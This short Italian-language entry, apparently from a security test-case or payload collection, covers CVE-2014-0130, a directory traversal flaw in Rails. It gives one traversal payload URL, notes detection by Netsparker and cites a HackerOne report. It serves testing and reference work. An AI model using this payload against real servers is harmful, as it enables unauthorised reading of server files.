
cve-2014-0130 vulnerabilità di attraversamento delle directory in rails
== Caso di test CVE-2014-0130
Payload : http://site/api/%5C../%5C../%5C../%5C../%5C../{{CAT_DIR}}
=== Rilevato da Netsparker :
https://i.imgur.com/s1vahmj.png
== HackerOne 1 - vulnerabilità di directory traversal in Rails su newrelic.com di droidsec - https://hackerone.com/reports/134032
== Riferimenti